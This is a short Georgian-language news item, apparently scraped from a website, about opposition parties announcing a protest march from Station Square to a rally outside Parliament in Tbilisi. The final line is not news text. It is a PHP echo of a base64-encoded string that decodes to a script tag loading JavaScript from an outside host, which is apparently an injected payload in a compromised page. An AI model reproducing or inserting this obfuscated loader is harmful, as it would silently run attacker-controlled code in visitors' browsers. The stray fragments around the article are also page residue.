celsiusi
ავერსი საქკაბელი

პარლამენტთან დღეს დაგეგმილ აქციასთან დაკავშირებით ბარიერგადალახული ოპოზიციური პარტიები განცხადებას ავრცელებენ და აღნიშნავენ, რომ სადგურის მოედნიდან მსვლელობას თავად პოლიტიკური პარტიების ლიდერები გაუძღვებიან.

როგორც განცხადებაშია ნათქვამი, საპროტესტო მარში 17:00 საათზე დაიწყება.

„დღეს 19:00 რუსთაველის გამზირზე, პარლამენტთან გაიმართება საპროტესტო აქცია.

აქციამდე, 17:00 საათზე, ოპოზიციური პარტიების მხარდამჭერები და პროტესტის მონაწილეები შეიკრიბებიან „სადგურის მოედანზე“, „თბილისი ცენტრალის“ მიმდებარე ტერიტორიაზე, საიდანაც მოეწყობა მსვლელობა - საპროტესტო მარში.

მსვლელობას გაუძღვებიან პოლიტიკური პარტიების ლიდერები“,- ნათქვამია განცხადებაში.

74
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");